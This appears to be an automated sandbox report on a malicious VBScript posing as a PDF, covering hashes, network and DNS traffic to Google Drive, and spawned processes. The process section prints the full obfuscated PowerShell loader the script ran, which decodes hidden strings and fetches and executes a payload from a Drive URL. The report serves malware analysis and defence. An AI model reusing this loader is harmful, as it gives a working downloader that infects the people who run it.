                                Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="LpUUTepYXke4rbF2yA1V9w">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.008490228118308
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:U00b7pdf.vbs
                                File size:371'107 bytes
                                MD5:6e74f3450b6a5719b9e71f6ea32295ce
                                SHA1:790344f4225b4a5e904f3e06de6aac6fa9fe58d5
                                SHA256:6c0c6d699be7442dcd1e34507ac5f9103fcf2a220b032e2e7159805c820a0483
                                SHA512:e786b1d77fc45308d923f1a8dcafc4ee7e6a5423e13a4ec4c4a028cb4f358faa6352a4da73c11dcde94be60486ffaa430250c26e5cf7219a58c73d140c040e4d
                                SSDEEP:6144:ixRLaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkPX:0GInOiOi9PIM
                                TLSH:FD8428E2CAC52A298A461AB7ED230B338DB4815D73131F3897BDC65D604395C86BFBD4
                                File Content Preview:..Rem rebring superchivalrousness occidentalise19 gangstolen aftgten; biz arrilds highbrowism; halvtredskroneseddels popmusik175; bevgelsesmngder..Rem Oenomel: bygrnsers tilstedevrende kritarchy...Rem Aulacodus kartoteksprogrammerne138 waleskringles clupe
                                Icon Hash:68d69b8f86ab9a86


                                • Total Packets: 21
                                • 443 (HTTPS)
                                • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 15, 2024 07:26:10.889549971 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:10.889601946 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:10.889694929 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:10.909672976 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:10.909693956 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:11.247036934 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:11.247142076 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:11.248583078 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:11.248680115 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:11.253257990 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:11.253278017 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:11.253746033 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:11.272105932 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:11.316236973 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:11.593877077 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:11.594095945 CEST | 443 | 49706 | 172.217.12.142 | 192.168.2.8
Apr 15, 2024 07:26:11.594149113 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:11.620738029 CEST | 49706 | 443 | 192.168.2.8 | 172.217.12.142
Apr 15, 2024 07:26:11.779486895 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:11.779529095 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:11.779599905 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:11.779970884 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:11.779983044 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.108016968 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.108175993 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:12.110951900 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:12.110961914 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.111511946 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.112615108 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:12.156286001 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.926942110 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.927092075 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.927099943 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:12.927129030 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.927176952 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:12.927186012 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.927242994 CEST | 443 | 49707 | 142.250.72.129 | 192.168.2.8
Apr 15, 2024 07:26:12.927299023 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Apr 15, 2024 07:26:12.928893089 CEST | 49707 | 443 | 192.168.2.8 | 142.250.72.129
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 15, 2024 07:26:10.723887920 CEST | 50965 | 53 | 192.168.2.8 | 1.1.1.1
Apr 15, 2024 07:26:10.880984068 CEST | 53 | 50965 | 1.1.1.1 | 192.168.2.8
Apr 15, 2024 07:26:11.623128891 CEST | 59180 | 53 | 192.168.2.8 | 1.1.1.1
Apr 15, 2024 07:26:11.778728962 CEST | 53 | 59180 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 15, 2024 07:26:10.723887920 CEST | 192.168.2.8 | 1.1.1.1 | 0xb612 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 15, 2024 07:26:11.623128891 CEST | 192.168.2.8 | 1.1.1.1 | 0x868d | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 15, 2024 07:26:04.733999968 CEST | 1.1.1.1 | 192.168.2.8 | 0x2ca9 | No error (0) | windowsupdatebg.s.llnwi.net | | 68.142.107.4 | A (IP address) | IN (0x0001) | false
Apr 15, 2024 07:26:10.880984068 CEST | 1.1.1.1 | 192.168.2.8 | 0xb612 | No error (0) | drive.google.com | | 172.217.12.142 | A (IP address) | IN (0x0001) | false
Apr 15, 2024 07:26:11.778728962 CEST | 1.1.1.1 | 192.168.2.8 | 0x868d | No error (0) | drive.usercontent.google.com | | 142.250.72.129 | A (IP address) | IN (0x0001) | false
                                • drive.google.com
                                • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 172.217.12.142 | 443 | 6500 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-15 05:26:11 UTC | 215 | OUT | GET /uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_ HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Connection: Keep-Alive
2024-04-15 05:26:11 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 15 Apr 2024 05:26:11 GMT
                                Location: https://drive.usercontent.google.com/download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download
                                Strict-Transport-Security: max-age=31536000
                                Cross-Origin-Opener-Policy: same-origin
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-7Y0UF-rPspbe2_D2QTSQwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49707 | 142.250.72.129 | 443 | 6500 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-15 05:26:12 UTC | 233 | OUT | GET /download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
2024-04-15 05:26:12 UTC | 2112 | IN | HTTP/1.1 200 OK
                                X-GUploader-UploadID: ABPtcPorZZ1CXXUh20ZT6KeXpSqT0NolVq-nYpB-3Y5hTJ4mgQoKdm3epa5W4pvR_7LfRGyMYWk
                                Content-Type: text/html; charset=utf-8
                                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 15 Apr 2024 05:26:12 GMT
                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                Cross-Origin-Opener-Policy: same-origin
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-lIJ_zfLCQB4MXfuQYd4djg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Cross-Origin-Resource-Policy: same-site
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzjUtDikmLw15BisN47ndUeiJ3SZ7CGAPHqn-dY1wOxEA_Hly-fNrAJXGjZ0MIMAGyaEhc"
                                Content-Length: 1692
                                Server: UploadServer
                                Set-Cookie: NID=513=bYE2r6JPbrxzq2-k-Gzv5FPs6zIv0p-o-ggKTUCCFuUWLW-7QmZYQ4SS1WNMJk6IiZ97SsaJ-MhWMnJA2BBj_Bf1PpV1q7kapezVObiPdz24kiCiyQWnNF7IO6wGb2FnVNuvtf2f-AIzp63NhKaL2bNnf3Scbc3J8wTXTZ9Eghk; expires=Tue, 15-Oct-2024 05:26:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Content-Security-Policy: sandbox allow-scripts
                                Connection: close
2024-04-15 05:26:12 UTC | 1692 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 70 55 55 54 65 70 59 58 6b 65 34 72 62 46 32 79 41 31 56 39 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="LpUUTepYXke4rbF2yA1V9w">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


[Process timeline chart omitted: x-axis time in s (0 to 100), y-axis memory in MB (0 to 100)]

[Process behavior distribution chart omitted: categories File, Registry]
                                Target ID:0
                                Start time:07:26:02
                                Start date:15/04/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"
                                Imagebase:0x7ff74b840000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:07:26:07
                                Start date:15/04/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. 
Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVWaflibdiTrunkserJunke.egUdmundeiRundkinn H regea Strengl BreastlSatsensyVisumhy= Frif,n$Fatho aCLavritsa HeinerrHier.magDomineeoHjttalelTornskai 
Lum,ernBestteleP,lleeor Rest,a.D.uglcosAcinetapAfskedslNecrophiSuperfatBiplans(Hem gen$TrnjbrtCUnkerchoFuldbefnRabbites LilithtCelluliaKlagerebIso.iazlCullende frdigesSystemis Akkli.)moujiks ');$Cargoliner=$Virginally[0];Dentagra176 (Rekordjagt 'Ell.kra$BavianhgSansninl,verdazoPa alleb Ac,ievaFjerdral For,se: sisyfoTFjortenrLevemuliOutspartStjko tu,isammebUnderboeSkolemerTilt gec AlgkiruSurfperlFu.ionsasalutatrleik.sg= VaertsNAntropoeFnike.dwDummere-E peditOTillavebOrchiocjRescoreeSpyttebc.ippingtD mogra KromgarS Audiomy alaxisSufeismtP,eudonedecurvemHusband.Epap phNLinkx.peUnintuitMisimag.Porto,rWVinkelse BrantsbUsigtbaComstninl Lunterisa.fundeCiviestn HypopytTric nn ');Dentagra176 (Rekordjagt 'Ejendom$NdkcaudTAm.ulanrTotalisi Str pntAlexiusuReprescb,estsigeMalodorr Ne trac,etleheuGulfyhilIntendeaDittychrScrideu.Schesi HCh,ndroeBreatheaUngdomsdCycloheeFractiorBesi desPastaen[En,kter$BoltheaRCobbl suAfgangsbLgelf ey TilvejsM,sshap] Deemph=Orthoxa$RhesuspS .asovnkEzaskrorRatinepiStraighvFlorineeForhast ');$Reinitializes=Rekordjagt 'HvilendTBestyrkrProdukti EtikettOverwa u VegetebCommunie FrstebrPulsi.nc Kriseru AntimelBe.eficaEstraderRegnska.BestrniDAlbigeno CuffspwReetablnNevaditl,ederalo TabelsaInfantedMisformFMicrospiAlkyderlgluti oeEftersl( Unfrac$ PrerecCDeludinaSn,ptagrRediss,gVamfontoperfectlExos eli ForstanDrvtyggeAugmentrTrretum, ,ernsb$ GibuseOValerolb pidsmulraindroiSk.pfulg Timneva Immor,tPlasmaciStall,noSocialbn Indskrs OronokrRoquelaeRkee.gltWarfaret Frsteiefalsn.nnFlerhedsTrach o) Skrive ';$Reinitializes=$Hypersensibility[1]+$Reinitializes;$Obligationsrettens=$Hypersensibility[0];Dentagra176 (Rekordjagt 'Weeken.$OvigermgMbelsnelHorizonoHydrobrbAraneinaTankstal Crumbl: regentS Bordvie EpicysmFormyndi ThyroafUndistoeThumbdir lyrehaoTidskrauShrinalskva,rat=Gangb.t(Driver.T .kolesePsychoasBolsjevtEfterve-NjagtigPGrimassa nsomsttUniversh Person Guelphi$ Mal ilOPeriferbYngelsolsvin,kdiFranc sgBundtekaFrems,it D,triniBssens oMetacarnDisa.ses Anti 
erPunctuaeAfskovntvsentlitIntertieNoalsnon Morel,s Aigudh)Perusal ');while (!$Semiferous) {Dentagra176 (Rekordjagt 'Virt.os$hypotymgDisk,ntlAnsvarsoSkruea,bArchdioaCursi gltourers:UdspredCHyperagu Kngtenr h,wlsbcE eterfuA,akolulAuthentiArbejdsotilhrsf1Spygatt6 Krydde0Fukssva= Gryrsa$LaegkartFjortenrShareowuPartikae Alvide ') ;Dentagra176 $Reinitializes;Dentagra176 (Rekordjagt 'DismissSJobb rit odbolaF,turisrSlikportInjust.-Betonb S UnderrlSprezzaeDeltidseLigularpAgtelse stim rn4Capr,ll ');Dentagra176 (Rekordjagt 'U.vener$ HalvdrgFl,mndelFret,oroRedimenbMagis,eaAnensrelOutbble:Sp.dbjnS ArsenieDi,ulgamReproofiO rrsaafUn corneReasc,nr Spl,ttoTo vinkuMetalans menis=Analyse(VideoplTHj.rtebeSidney,s Barkent Sneakb- C epepPAnchis aBorshtatHyperaehKomiker Jeelped$ PlagioOBlunderbInt.osplBaghussiSt.tssagPsycholaAboiteatSlyngeliPointtaoas.hyxin Tanny sEx,ortarTikampeePaatry,tSyphilotTrullsseVitessenPosturesPoetica) Lentic ') ;Dentagra176 (Rekordjagt 'Mokkasi$K.anategWindchelHftetseo Fag idbPrv tekaReddsmalSkonner: Prci eW Op rtcaPte,ygolRigsbyfkPistolaeIndbildn Demilie Spirit=Kise su$UnkamedgDdspatrlRamexdioFlamberbKra,tanaKatapu lNitroge:PrdikatP Offs.crKraftudeTrommesa Artf.lcUdgivelc E.domoutransprsexostott Taageroselvporm,eminereOrdlistdGrundst+G.seous+Unschol%,reyfly$Erudit,VTekstbeiKileskrrStopklogMirdscuiBlufrdinI,dhsteaBankerolSerenesl Exc,mmyEpicond.He.skabcLigasedoSnogehau machinn Deprivt Gabrie ') ;$Cargoliner=$Virginally[$Walkene];}Dentagra176 (Rekordjagt ' gascon$Bowlin,gL.ndkralPikketroSi imidb S,stemaBihulerlBedro.v:ragaersGUnpala.eRe,otednFrontoon BoligseBasketkmRdligs.rEm.ergeykildlumsOuttel.t minisyeUdpantntKulstof Opgoere=epil ch flawynuG .remfueAfm,grit Tytteb- BusrejCInoffenoGalinsonBubblelt UdvaeleArvem tnLimfabrtinsipid Br.gtfl$HavkattOTrachymbbeseemslDiphycei nwithgcoagu aaDecnetatPersistiNon.enuoatomiesn CiliassAflyssdrPaasknneVelve ptAnnoncetDispatee,ykelbunTrykmaasBjer ni ');Dentagra176 (Rekordjagt 'Chanc,a$Cytoplag Scu.lel Arianio 
coadapbViaduktaRem mbelUltra o:SendebuSFlersidhHeirleseImposanl Hoved l AntelapCoordinoUnprodut Triole Orbb.gr=Th,esub Stann,r[Um eledSfo drveyMinglinsYau snvtRe eptpeObservemAntipro. postaCSpildevoRafflesnGummyinvSyntakseRecleanrT xifyitFortrol]Dagsbef: Mia,ss:Li ieteFmissilfrGoddampoRm rsskmBinde,tBHandelsaSliderssPr,tosueSjalern6Fragmen4S.ovskaSmaltf.btFalklanrUudholdiTostaven Poonacg.rstatn(Beskytt$ BruserG Hnder.ePennysinEluat.dnBoblekae Fornemm Baandsr Forms yFodsveds riticatGaffelte feudaltUdludei)Unjusti ');Dentagra176 (Rekordjagt 'hommos,$Banefulg PerconlNonbrutoTilbagebPatr nia WaspnelAcaulou:HaandgrS ,lokbecMarengsrWeb tedaSlightewforlag.l Bvelsee revendrSto,tilsolivene Superma=Cor cob Viruci[ ObteneSCarmi iy IaomalsForcipatDeck.nge HydropmF.ldblo.SalvninTEsmarale Eph dsxTran,ort Kolleg. UdbudsEAnalysenve stancGainsaioCyborgsdTransfoiCounternMicrophg Smi hc]Vital t:P,ospho: .abellA PhaseaSMisfaitC ArbejdIFilipsgIG yceri.UnfavouGTroubleeMoto istsatir sS PolymetJulef,srLiniestiSy.sttynRataplagTil,rop(Sandkas$ Acce eSSudsmenh CymbideHirsti lPedagoglRhe.usnpJ risdiokundeaftTanekah) Vaagne ');Dentagra176 (Rekordjagt 'plancie$DynamitgThisllplPhascoloLunulaebUnder laClearehlb kldni:FllenesSAfskrkktAkutfunaNedska,tInterplicanop.cs s ndort,akshisi LgnernkPolemarpSensortrForsumpoAarligegDeckelsrDruideraLyknsknmGteskab2Spunkle6doerene=.yvinsa$TanzaniSCrzettec A.abolrBalanopaMisusedwUfordellForhippeDivisi rR,condis Paa ag.Udsendis HematouGaardrybColliersTraffictUvsentlr UrningiCi,ratenAshiestg Sumlog(Monstrs2Fourche9Deu,obr9 Phrase6Advoka,0Klukkes9 Uncial,D,ddelp3Dorritu0Ra.ioli1Recap t5 Filmsp6Ac tylb) Hjrnes ');Dentagra176 $Statistikprogram26;"
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:07:26:07
                                Start date:15/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:07:26:09
                                Start date:15/04/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $"
                                Imagebase:0x7ff7ec1d0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Executed Functions

                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1575553037.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b370000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: @NK$@NK$@NK$@NK$@NK
                                • API String ID: 0-233114815
                                • Opcode ID: 948daf89df93da24e6d896ee80b1bb8a6d8b9034aef427e977e0b23da0ac47b4
                                • Instruction ID: f8f9f50dc6002429dce0abcb2bf86f97012ba8c22c4f2def0d5b25e5892ad3b8
                                • Opcode Fuzzy Hash: 948daf89df93da24e6d896ee80b1bb8a6d8b9034aef427e977e0b23da0ac47b4
                                • Instruction Fuzzy Hash: 14D167A290EACA9FE796AF79C8555B57FE0FF06210B1880FED58CC71A3D9189C05C391
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1575553037.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b370000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: P,OK
                                • API String ID: 0-1307682024
                                • Opcode ID: 6e8c4d6d4b67a10b5f66d2546725f3de0d083f7db6b534d896599b18216886e8
